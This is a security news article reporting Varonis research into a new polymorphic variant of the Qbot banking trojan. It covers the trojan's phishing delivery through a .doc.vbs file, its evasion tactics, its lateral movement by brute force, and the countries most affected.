Threat Management, Malware, Phishing

Shifty new variant of Qbot banking trojan spreads

An active malware campaign primarily targeting U.S. corporations with a new polymorphic variant of the Qbot banking trojan has been compromising thousands of victims around the world, researchers have reported.

The worm-like malware, whose original version is roughly a decade old, allows attackers to collect browsing activity and steal bank account credentials and other financial information. This is accomplished through a combination through a combination of techniques, including keylogging, credential and cookie exfiltration, and hooking.

Despite the campaign's focus on the U.S., victims have been observed as far as Europe, Asia and South America, according to a blog post today from Varonis.

At last report, the company found 2,726 unique victims IP address, but the true number is most likely considerably larger. The U.S. is home to 1,730 of these victims, with the U.K., Germany and South Africa the next most affected nations.

Also known as Qakbot, "Qbot employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders," warns blog post authors and researchers Dolev Taler and Eric Saraga. The variant, they explain, constantly modifies its tactics, creating files and folders with random names, frequently switching command-and-control servers and even changing the malware loader where there is an active internet connection.

Varonis believes the new Qbot is likely spreading via a phishing operation. This theory that is supported by the discovery of a zip file carrying a malicious VBS file with a .doc.vbs extension.

This VBS file determines the OS version of the victim's machine and then looks for signs of anti-virus software from various major security vendors. And in a new behavior, the malware uses the BOTSAdmin command-line tool to produce a downloader component that ultimately introduces the main malicious payload.

Different victims may receive different loaders depending on a hard-coded parameter found in the VBS file. But they all have one thing in common: they are each signed with a fake or stolen certificate to help evade detection.

After gaining persistency, Qbot begins to spread laterally by brute-forcing other accounts on the victim's network. "If the malware compromises a domain account, it enumerates the 'Domain Users' group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead," the blog post said.

Further investigation of the C2 server revealed what look to be additional malware, Varonis notes. 

Bradley Barth

As director of community content at CyberRisk Alliance, Bradley Barth develops content for SC Media online conferences and events, as well as video/multimedia projects. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.